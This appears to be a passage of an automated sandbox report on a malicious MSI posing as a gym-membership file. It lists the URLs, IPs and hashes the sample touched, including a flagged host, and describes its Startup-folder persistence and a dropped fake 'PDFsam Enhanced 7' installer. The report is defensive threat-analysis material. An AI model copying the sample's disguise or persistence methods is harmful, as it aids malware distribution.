                                                                                    http://tempuri.org/CompressSimpleTrackSetupPDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://certs.oati.net/repository/OATICA2.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://crl.oces.trust2408.com/oces.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.cert.fnmt.es/dpcs/PDFsamEnhanced7Installer.exe, 00000006.00000003.689677218.0000000004A2F000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.quovadis.bm0PDFsamEnhanced7Installer.exe, 00000006.00000003.696206732.0000000004A20000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://eca.hinet.net/repository0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://crl.ssc.lt/root-a/cacrl.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://certs.oaticerts.com/repository/OATICA2.crlPDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.trustdst.com/certificates/policy/ACES-index.html0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://certs.oati.net/repository/OATICA2.crt0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.accv.es00PDFsamEnhanced7Installer.exe, 00000006.00000003.689712753.0000000004A11000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.pkioverheid.nl/policies/root-policy-G20PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.netlock.net/docsPDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.e-trust.be/CPS/QNcertsPDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://ocsp.ncdc.gov.sa0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://tempuri.org/http://tempuri.org/MessagedescriptioncpudatadataPDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://web.ncdc.gov.sa/crl/nrcaparta1.crlPDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.datev.de/zertifikat-policy-int0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                            		high

                                                                                            Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            146.70.41.157
                                                                                            		unknownUnited Kingdom
                                                                                            		2018TENET-1ZAtrue
                                                                                            64.15.159.234
                                                                                            		api-updateservice.pdfsam.orgCanada
                                                                                            		32613IWEB-ASCAfalse

                                                                                            Private

                                                                                            IP
                                                                                            127.0.0.1

                                                                                            General Information

                                                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                                                            Analysis ID:496721
                                                                                            Start date:04.10.2021
                                                                                            Start time:21:27:11
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 11m 49s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Sample file name:Nyship-Empire-Plan-Gym-Membership.msi
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Number of analysed new started processes analysed:23
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal100.rans.troj.evad.winMSI@19/326@2/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 33.3%
                                                                                            HDC Information:Failed
                                                                                            HCA Information:Failed
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            • Found application associated with file extension: .msi
                                                                                            Warnings:
                                                                                            Show All
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.203.141.148, 2.20.178.56, 2.20.178.10, 20.49.157.6, 93.184.221.240, 67.27.233.126, 8.253.204.249, 8.248.139.254, 8.248.141.254, 8.248.131.254, 13.107.246.254, 13.107.3.254, 20.54.110.249, 52.251.79.25, 40.112.88.60
                                                                                            • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, s-ring.msedge.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, t-ring.msedge.net, s-ring.s-9999.s-msedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, store-images.s-microsoft.com, s-9999.s-msedge.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, t-ring.t-9999.t-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                            • Execution Graph export aborted for target PDFsam_Enhanced_7_Installer.exe, PID 7016 because there are no executed function
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            21:28:18API Interceptor2x Sleep call for process: PDFsamEnhanced7Installer.exe modified
                                                                                            21:28:21API Interceptor121x Sleep call for process: powershell.exe modified
                                                                                            21:28:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aceef8ac0de486b7cbb4c345e0d7f.LNk

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            64.15.159.234Sample-Rfp-Evaluation-Criteria.exeGet hashmaliciousBrowse
                                                                                              Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exeGet hashmaliciousBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                api-updateservice.pdfsam.orgSample-Rfp-Evaluation-Criteria.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                wsgeoip.pdfsam.orgSample-Rfp-Evaluation-Criteria.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                TENET-1ZAUpsxN0u4wiGet hashmaliciousBrowse
                                                                                                • 196.249.7.94
                                                                                                HeCoAUTGxqGet hashmaliciousBrowse
                                                                                                • 146.68.69.68
                                                                                                H2okZ1vMzQGet hashmaliciousBrowse
                                                                                                • 152.116.173.48
                                                                                                H9pNgz5hYJGet hashmaliciousBrowse
                                                                                                • 154.114.47.242
                                                                                                mipsGet hashmaliciousBrowse
                                                                                                • 198.54.249.102
                                                                                                Le85313EpPGet hashmaliciousBrowse
                                                                                                • 146.68.147.184
                                                                                                GbjE8AwfrzGet hashmaliciousBrowse
                                                                                                • 146.68.147.144
                                                                                                xd.arm7Get hashmaliciousBrowse
                                                                                                • 155.238.224.145
                                                                                                i686Get hashmaliciousBrowse
                                                                                                • 196.248.26.30
                                                                                                xUAaxUb8FSGet hashmaliciousBrowse
                                                                                                • 155.232.3.131
                                                                                                ShxmSBgPmyGet hashmaliciousBrowse
                                                                                                • 155.232.14.34
                                                                                                avoBhD19xaGet hashmaliciousBrowse
                                                                                                • 143.128.121.101
                                                                                                hsX64Ks4v4.exeGet hashmaliciousBrowse
                                                                                                • 146.70.35.170
                                                                                                S33PX8RMOr.exeGet hashmaliciousBrowse
                                                                                                • 146.70.35.170
                                                                                                K6skRE2yZL.exeGet hashmaliciousBrowse
                                                                                                • 146.70.35.170
                                                                                                WRviH7DeD2.exeGet hashmaliciousBrowse
                                                                                                • 146.70.35.170
                                                                                                uzO244DiJl.exeGet hashmaliciousBrowse
                                                                                                • 146.70.35.170
                                                                                                WTRwRnjCgW.exeGet hashmaliciousBrowse
                                                                                                • 146.70.35.170
                                                                                                xAXmYQxwZk.exeGet hashmaliciousBrowse
                                                                                                • 146.70.35.170
                                                                                                owQ0vqO36n.exeGet hashmaliciousBrowse
                                                                                                • 146.70.35.170
                                                                                                IWEB-ASCASHIPPING ADV#GOLDEN TULIP.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                SHIPPING ADVICE.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                arm7Get hashmaliciousBrowse
                                                                                                • 192.175.105.35
                                                                                                SHIPPING ADVICE#QINGYANG.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                CONTRACT SIGNED.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                sora.x86Get hashmaliciousBrowse
                                                                                                • 192.175.105.58
                                                                                                SHIPPING DOCUMENTS#ASIA.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                SHIPPING ADVICE#IFL.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                SHIPPING ADV#202109.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                o5N85mOVm1Get hashmaliciousBrowse
                                                                                                • 203.167.7.19
                                                                                                Sample-Rfp-Evaluation-Criteria.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                SHIPPING INSTURCTION INVOICES.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                Xyk3h1yoogGet hashmaliciousBrowse
                                                                                                • 174.142.195.55
                                                                                                SHIPPING ADV-BL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                • 174.141.231.182
                                                                                                OQchDohurA.exeGet hashmaliciousBrowse
                                                                                                • 184.107.95.59
                                                                                                fsd8ks3VNb.exeGet hashmaliciousBrowse
                                                                                                • 198.72.99.224
                                                                                                1wKONPeBx1.exeGet hashmaliciousBrowse
                                                                                                • 174.142.221.75
                                                                                                UW0Lx1YV5l.exeGet hashmaliciousBrowse
                                                                                                • 184.107.95.60
                                                                                                uX24M5IH33.exeGet hashmaliciousBrowse
                                                                                                • 184.107.179.26
                                                                                                PFm5r5Zeb4.exeGet hashmaliciousBrowse
                                                                                                • 184.107.95.192

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                37f463bf4616ecd445d4a1937da06e19Yfqbmuahufznqznknlmwfrtnauqppwcobt.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                tn4598151.xlsmGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                Dylan#75658241.htmlGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                State-ment(03.10.2021)VMEK.vbsGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                State-ment(10.03.2021)SKIF.vbsGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                re-ceipt6536UV2-HLPR6L-GAU1.htmGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                Lettera di restituzione per Siberia LLC.jpeg.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                FACTURA.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                Factura n#U00ba749962.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                tn1020931.xlsmGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                3132Silke#Ud83d#Udce0.HTMGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                facturas.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                HSBC_Payment_slip_for Outstanding 001005l.htmGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                0000004017.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                yrh1FpcTRK.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                f6wgOTmSAh.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                INV#13891.htmGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                Purchase_Order.htmlGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                Invoice_.htmlGet hashmaliciousBrowse
                                                                                                • 64.15.159.234
                                                                                                factura n#U00ba0248325.exeGet hashmaliciousBrowse
                                                                                                • 64.15.159.234

                                                                                                Dropped Files

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dllSample-Rfp-Evaluation-Criteria.exeGet hashmaliciousBrowse
                                                                                                  Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exeGet hashmaliciousBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\Config.Msi\5206a9.rbs
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):878019
                                                                                                    Entropy (8bit):6.348387727408553
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:YLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rn:YLwqsBcLDe+u2lkEWl7DCGCfT
                                                                                                    MD5:AA0CFA9123C3CC4227F93FB7C9CD6668
                                                                                                    SHA1:C28541987EEE1A3A75ACAF23588D0B1BB0A4CE93
                                                                                                    SHA-256:70878FD3A0F4B93F2AD81F1DF2E2CDF48C68397F19AF62591A4F9759284B17D3
                                                                                                    SHA-512:638EFC41324C762DEABCEAF3A903F3CDA53889066A8D674C63FB4D40E3E2D44D4EBA93C53CEA2A500026CE8AF60F0FFDA88640E9AB98BC90B059D46D2EB1FE48
                                                                                                    Malicious:false
                                                                                                    Preview: ...@IXOS.@.....@..DS.@.....@.....@.....@.....@.....@......&.{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}..(EMCO EVALUATION PACKAGE) - V2%.Nyship-Empire-Plan-Gym-Membership.msi.@.....@.....@.....@........&.{549A417F-BD1F-4387-A76F-A86CCEF6964C}.....@.....@.....@.....@.......@.....@.....@.......@......(EMCO EVALUATION PACKAGE) - V2......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ECA_InstallRollbackL...ECA_InstallRollback.@.......C..MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0........
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16852824
                                                                                                    Entropy (8bit):6.81149936180454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:393216:6tGKFBfXhHQiYxSoJQCCdzlQEblI2rqNCFnWZYLjDkQ:kDFBfRgxS+CvQmIynWZRQ
                                                                                                    MD5:801B1B11E979AF812CA4387E5F438AD8
                                                                                                    SHA1:180EF9CF27EB259954D2225B0621408A1E1F3F5E
                                                                                                    SHA-256:81F0C9FFF344742455596A5062FD6875B28BD9981469575164DF942F1C9AD2B2
                                                                                                    SHA-512:2E14902BE3B577A06E0A93700F2EB7E27EDF6F348958B8BD59F1FF9B3709AAF56AFE4BCB7224D0EDD6033308CD71ECF6744DD5782FD62F41859EB404F3212D96
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                                                                    Preview: MZ......................@...................................`...........!..L.!This program cannot be run in DOS mode....$.........!...r...r...r...s..r..1r...rg1.r..r...s..r...s..r...sP..r...s..r...s...r...s...r...s...rN..s..rc..s!..rc..s,..r...r..re..s..r...r...r3..s...r2..s..rN..s...rN..sk..rN..s...rN.3r...r..[r...rN..s...rRich...r........PE..L...=.._.....................vh..................@.......................................@......................... ...4...T...........S;.............X!...0...^...i..T...................Dj......0...@....................T.. ....................text............................... ..`.rdata..6........ ..................@..@.data...x...........................@....rsrc....S;.....T;..R..............@..@.reloc...^...0...`..................@..B........................................................................................................................................................................................................
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):2798912
                                                                                                    Entropy (8bit):6.708611547038991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:WebZrnP1wK+J+d1BWQgua2ag6yi8tUd9KWrLjsZuIJFoixkAREkVdJxospg:VbzL+Jc1YTua2fs91XjsZumoixPC
                                                                                                    MD5:417F5C1E34D2ABC002301BA08C546B6D
                                                                                                    SHA1:834A9410DA82FECBCB00E641FB403919EC11F3B9
                                                                                                    SHA-256:2AEE68C1D66E0BD7741DBE002719C71017094FE3BB506F75AAA859815A089329
                                                                                                    SHA-512:CB2F38D22025CFB4F276691E1E10EAE47B659B6375F8CBA7366BA6A7EC2384B5886764913CA69E274EC000133276B8FBDDC33A8567DD576F3E498429B69CE605
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Sample-Rfp-Evaluation-Criteria.exe, Detection: malicious, Browse
                                                                                                    • Filename: Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe, Detection: malicious, Browse
                                                                                                    Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......G..p.~u#.~u#.~u#X.v".~u#X.p".~u#X.s".~u#..#.~u#..p".~u#..q".~u#..v".~u#X.q".~u#..p".~u#X.t".~u#.~t#%.u#..p"K~u#..p".~u#..}"C~u#..u".~u#...#.~u#.~.#.~u#..w".~u#Rich.~u#................PE..L...-.._...........!.....T!..................p!..............................`,.......*...@..........................R'......S'...... *..t...........~*.@7....*.h.....$.T.....................$......$.@............p!..............................text...AR!......T!................. ..`.rdata..n....p!......X!.............@..@.data...8....p'......T'.............@....rsrc....t... *..v...T(.............@..@.reloc..h.....*.......(.............@..B................................................................................................................................................................................................................................................
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\curl-ca-bundle.crt
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):222997
                                                                                                    Entropy (8bit):6.025672250373848
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:QflGUhzIjom0UMwo6J7gZ7IvqT3x9BYv0yvAvVT/mRR283rz9KKbWqI+CyrGj4J4:16m0Yo+kZbqcBdbgF8+yaU5R5iSYxM
                                                                                                    MD5:1E32496378E8FEE43CB01B0689963A67
                                                                                                    SHA1:1D4CE2B3DD7F71F4725E6A030D6E25B8A4731508
                                                                                                    SHA-256:5B47AEE36F594B7737E00990C9922A87252729B74CC2F1A83C0FCEED9816BDB9
                                                                                                    SHA-512:80339D47B383EE0BCE769E3723FB2AA1925E6963325733FC12435138F98C996912851792C8EA451ED3EFF66E1B74DEE984662F759E894F5A663115FCB4005253
                                                                                                    Malicious:false
                                                                                                    Preview: ##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Wed Jan 23 04:12:09 2019 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.27...## SHA256: 18372117493b5b7ec006c31d966143fc95a9464a2b5f8d5188e23c5557b2292d..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\logs\log.ERROR.20211004-212849.616
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170
                                                                                                    Entropy (8bit):5.014395426216142
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:2J9btYQMfDFJSEsE1DLrrFJHIWCyRVB2NfWTTwFFT0Jgy5ziaXy:krMmE1f1JHIWC02NcMFptgzzXy
                                                                                                    MD5:3748FEAE1468A3AE61F1C3D0BC223C76
                                                                                                    SHA1:D0A3519079C2F7F1E9D4A39375C4F1961C655022
                                                                                                    SHA-256:F38402313D72F648AA2DFEFF9DA07DD3EB430B3AB61A44AC0CDF22FA62F730CE
                                                                                                    SHA-512:76D3448797F02EC0D8732525FBC8B19413117CA3FC9D6B39261E3D29E97F20CC71101182DF3DC39F14F4EA9E3E3DCF8E6A7A873DB96F06A915447DD76E71AAE8
                                                                                                    Malicious:false
                                                                                                    Preview: Log file created at: 2021/10/04 21:28:49..Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg..E1004 21:28:49.666409 6476 Updater.cpp:270] unknow error..
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\logs\log.INFO.20211004-212818.616
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):244
                                                                                                    Entropy (8bit):5.139888586095511
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:krMsE1f1JHIWC/NOClJghASS92NcMFptgzzXy:D9vIWWOPNUocyEy
                                                                                                    MD5:0556B002640495E5B9BB79181A8293AB
                                                                                                    SHA1:6893FF716F3C8D06B37AE4041C002C702E49FEC6
                                                                                                    SHA-256:D3F1374AE83464E4885BF392073D22CFF9AEA856CC2673C10D22F5515E6874C9
                                                                                                    SHA-512:ACCB916B2F1E2A4893FAFA19C27B0D4DEDCE95A05F03E87445282075F9725D9A10AD9547552819BF4F512F26E243B2ED97AECC92684E93AE6378AF1361C533DA
                                                                                                    Malicious:false
                                                                                                    Preview: Log file created at: 2021/10/04 21:28:18..Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg..I1004 21:28:18.016358 6476 Updater.cpp:186] IsNewVersionAvailable begin..E1004 21:28:49.666409 6476 Updater.cpp:270] unknow error..
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\logs\log.WARNING.20211004-212849.616
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170
                                                                                                    Entropy (8bit):5.014395426216142
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:2J9btYQMfDFJSEsE1DLrrFJHIWCyRVB2NfWTTwFFT0Jgy5ziaXy:krMmE1f1JHIWC02NcMFptgzzXy
                                                                                                    MD5:3748FEAE1468A3AE61F1C3D0BC223C76
                                                                                                    SHA1:D0A3519079C2F7F1E9D4A39375C4F1961C655022
                                                                                                    SHA-256:F38402313D72F648AA2DFEFF9DA07DD3EB430B3AB61A44AC0CDF22FA62F730CE
                                                                                                    SHA-512:76D3448797F02EC0D8732525FBC8B19413117CA3FC9D6B39261E3D29E97F20CC71101182DF3DC39F14F4EA9E3E3DCF8E6A7A873DB96F06A915447DD76E71AAE8
                                                                                                    Malicious:false
                                                                                                    Preview: Log file created at: 2021/10/04 21:28:49..Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg..E1004 21:28:49.666409 6476 Updater.cpp:270] unknow error..
                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61157
                                                                                                    Entropy (8bit):7.995991509218449
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                    MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                    SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                    SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                    SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                    Malicious:true
